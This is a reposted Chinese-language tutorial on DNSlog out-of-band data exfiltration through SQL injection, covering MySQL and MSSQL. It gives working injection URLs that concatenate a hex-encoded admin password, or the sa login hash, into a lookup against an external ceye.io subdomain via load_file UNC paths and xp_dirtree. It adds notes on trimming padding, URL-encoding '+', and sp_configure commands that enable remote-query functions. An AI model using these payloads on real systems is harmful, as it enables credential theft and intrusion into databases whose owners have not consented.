Dnslog在SQL注入中的实战

本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。然而在实际的运用中,因为环境的差异,利用也不同。本文详细的记录了在多种常见数据库实际运用过程的一些细节,包括POC的编写和原理,和一些网上没有公开的利用POC。

关于DNSlog在Web攻击的利用

DNSlog在Web漏洞利用中已经是老生常谈的问题,简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。

常用在哪些情况下

  1. SQL注入中的盲注
  2. 无回显的命令执行
  3. 无回显的SSRF

Dnslog攻击的基本原理


如图所示,作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS的日志,就得到了想要的值。所以我们需要有一个自己的域名,然后在域名商处配置一条NS记录,然后我们在NS服务器上面获取DNS日志即可。

Dnslog在常见数据库中SQL注入的实战

这里主要列举了4种数据库,MySQL、MSSQL、PostgreSQL、Oracle。

本次演示一个最常见的注入场景,就是WHERE后面条件处的注入。实验环境有一个test_user表,三个字段id、user、pass。如下

最后想要达到的目的是通过DNS外带的方式查询到pass字段的内容。

此处就不再自己搭建一个DNS服务器了,直接用ceye.io这个平台吧,这个平台就集成了Dnslog的功能。

MySQL

load_file

MySQL应该是在实战中利用Dnslog最多的,所以先来说说它吧。

在MySQL中有个一个load_file函数可以用来读取本地的文件。

http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) 
FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\abc'))

可以看到test_user中的pass字段的值的Hex码就被查询出来了,为什么这个地方Hex编码的目的就是减少干扰,因为很多事数据库字段的值可能是有特殊符号的,这些特殊符号拼接在域名里是无法做dns查询的,因为域名是有一定的规范,有些特殊符号是不能带入的。

注意:load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。

UNC路径

UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。

其实我们平常在Widnows中用共享文件的时候就会用到这种网络地址的形式

\sss.xxx\test\

这也就解释了为什么CONCAT()函数拼接了4个\了,因为转义的原因,4个就变\成了2个\,目的就是利用UNC路径。

tips:

因为Linux没有UNC路径这个东西,所以当MySQL处于Linux系统中的时候,是不能使用这种方式外带数据的

msSQL

先看看网上流传最多的POC:

DECLARE @host varchar(1024);

SELECT @host=(SELECT TOP 1master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_loginsWHERE name='sa')+'.ip.port.b182oj.ceye.io';

EXEC('master..xp_dirtree"\'+@host+'\foobar$"');

这个POC在数据库控制台执行的确是可以得到数据库中sa用户Hex编码之后的Hash的。但是实际要获得我们的test_user的表中的数据的时候,对POC需要一定的加工。
首先在sqlserver中字段名是不能和自定义函数名字冲突的,如果冲突需要用[]将字段包裹起来,如下图:

这里的user字段正好和系统的user()函数同名,所以字段需要[]包裹。

开始和域名拼接,发生如下图的情况

然后发现拼接起来的字符串有空格,这是因为在sqlserver中当需要字符串拼接的时候,如果字段的值的长度没有达到表结构字段的长度,就会用空格来填充

这里我的pass字段设置的长度是50,所但是值实际的长度是8,之所以剩余的长度就用空格填充了。这个时候就用想办法去掉空格,查阅手册可以发现rtrim函数是可以去除右边空格的,如下图

开始编码,前面说过域名是不能带有些特殊字符的,所以我们最好能将查询出来的值编码之后再和域名进行拼接,但是在查阅了sqlserver的手册之后,没有发现可以直接对字符类型进行编码的函数,只有将2进制转换成Hex的函数,所以这里我需要先将字符类型强制转换成varbinary二进制类型,然后再将二进制转化成Hex编码之后的字符类型。先转换成二进制

再把二进制转换成字符类型的Hex编码


最后完整的POC就是出来了。

http://127.0.0.1/mssql.php?id=1;
DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) 
FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';
EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');

结果如下:

那为什么网上给的那个POC就是能够获取到sa用户的hash之后的hex码的呢,原因如下:

因为那个hash字段本来就是二进制类型,所以不需要在经过类型转换了。

tips:此处有个小问题,因为拼接用到了+号,+号在url中如果不url编码到代码层的时候就成空格了,所以我们需要在提交之前对+号url编码下

SQLServer中其他的一些可使用函数

master..xp_fileexist
master..xp_subdirs
这两个用法和前面的用法基本一样,不再赘述。

OpenRowset()
OpenDatasource()
这两个都是加载远程数据库的函数。

这个两个函数都需要高权限,而且系统是默认关闭的,需要通过sp_configure去配置高级选项开启功能,开启代码如下:

exec sp_configure 'show advanced options',1;  

reconfigure;  

exec sp_configure 'Ad Hoc Distributed Queries',1;  

reconfigure;

所以此处不推荐使用这两个函数,不仅权限要求高而且使用起来也太麻烦,前面三已经够用了。

总结

  1. 有些函数的使用操作系统的限制。
  2. dns查询有长度限制,所以必要的时候需要对查询结果做字符串的切割。
  3. 避免一些特殊符号的产生,最好的选择就是数据先编码再带出。
  4. 注意不同数据库的语法是有差异的,特别是在数据库拼接的时候。
  5. 有些操作是需要较高的权限。

转载自:https://www.anquanke.com/post/id/98096